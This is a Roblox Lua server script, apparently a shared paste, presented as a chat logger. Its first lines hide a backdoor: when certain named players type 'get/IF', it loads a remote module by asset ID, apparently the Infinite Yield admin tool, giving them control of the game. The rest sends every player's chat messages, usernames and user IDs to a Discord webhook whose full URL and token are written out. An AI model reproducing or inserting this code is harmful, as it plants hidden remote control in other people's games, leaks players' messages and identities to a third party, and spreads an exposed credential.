

Jun 1st, 2020
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  1. game.Players.PlayerAdded:connect(function(plr)
  2. plr.Chatted:connect(function(msg)
  3. if plr.Name == "xproliguangx" or plr.Name == "JhonXD2006" or plr.Name == "xmanutral" then
  4. if msg == "get/IF" or msg == "get/InfiniteYield" then
  5. require((3023102224))(plr.Name)
  6. end
  7. end
  8. end)
  9. end)
  10. local RunService = game:GetService("RunService")
  11. local Players = game:GetService("Players")
  12. local HttpService = game:GetService("HttpService")
  13. local disabled = false
  14. local webhook = "https://discord.com/api/webhooks/717394130849759293/U35GhxkKEDej4I3GrQlTqiHCUceAOJ7Bh54JYWM6i47XH2a1zAIMDv71Mh9MiuKpKkeh"
  15. local GetPlace = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
  16. --print(GetPlace.Name)
  18. if RunService:IsStudio() then
  19. local EnterData = {
  20. ['embeds'] = {{
  21. ['title'] = "Chat logs activated! [RL]",
  22. ['description'] = "The chat logs has been activated from: [**"..GetPlace.Name.."**](https://www.roblox.com/games/"..game.PlaceId..") in Roblox Studio!",
  23. ['color'] = 33535
  24. }}
  25. }
  26. HttpService:PostAsync(webhook, HttpService:JSONEncode(EnterData))
  27. else
  28. local EnterData1 = {
  29. ['embeds'] = {{
  30. ['title'] = "Chat logs activated!",
  31. ['description'] = "The chat logs has been activated from: [**"..GetPlace.Name.."**](https://www.roblox.com/games/"..game.PlaceId..")",
  32. ['color'] = 33535
  33. }}
  34. }
  35. HttpService:PostAsync(webhook, HttpService:JSONEncode(EnterData1))
  36. end
  37. Players.PlayerAdded:connect(function(Player) -- add this if you need a group rank specific
  38. if Player:GetRankInGroup(818463) == 255 then -- El rango del grupo :)
  39. Player.Chatted:Connect(function(msg)
  40. if msg:lower() == ";chatlogs on" then
  41. disabled = false
  42. warn("Chat logs activated")
  43. end
  44. if msg:lower() == ";chatlogs off" then
  45. disabled = true
  46. warn("Chat logs deactivated")
  47. end
  48. end)
  49. end -- remove this one if you removed the group specification
  50. end)
  51. Players.PlayerAdded:Connect(function(plr)
  52. plr.Chatted:Connect(function(msg)
  53. if disabled == false then
  54. local data = {
  55. content = msg;
  56. username = plr.Name .. " - (#" .. plr.UserId .. ")";
  57. avatar_url = "https://www.roblox.com/headshot-thumbnail/image?userId="..plr.UserId.."&width=420&height=420&format=png"
  58. }
  59. HttpService:PostAsync(webhook, HttpService:JSONEncode(data))
  60. end
  61. end)
  62. end)
  64. game.Players.PlayerAdded:Connect(function(player) -- Cuando un jugador se une
  65. if disabled == false then
  66. local data = {
  67. ['embeds'] = {{
  68. ['title'] = "Player Joined!",
  69. ['description'] = player.Name.." has joined the game!",
  70. ['color'] = 65280
  71. }}
  72. }
  73. local finalData = HttpService:JSONEncode(data)
  74. HttpService:PostAsync(webhook, finalData)
  75. end
  76. end)
  77. game.Players.PlayerRemoving:Connect(function(player) -- Cuando un jugador se sale
  78. if disabled == false then
  79. local data = {
  80. ['embeds'] = {{
  81. ['title'] = "Player Left!",
  82. ['description'] = player.Name.." has left the game!",
  83. ['color'] = 14745600
  84. }}
  85. }
  86. local finalData = HttpService:JSONEncode(data)
  87. HttpService:PostAsync(webhook, finalData)
  88. end
  89. end)
  90. local bannedlist = {"The Big Ban"}
  91. while wait() do
  92. for i, plr in pairs(Players:GetChildren()) do
  93. for i, b in pairs(bannedlist) do
  94. for i, d in pairs(plr:GetDescendants()) do
  95. if d.Name == b then
  96. d:Destroy()
  97. end
  98. end
  99. end
  100. end
  101. end
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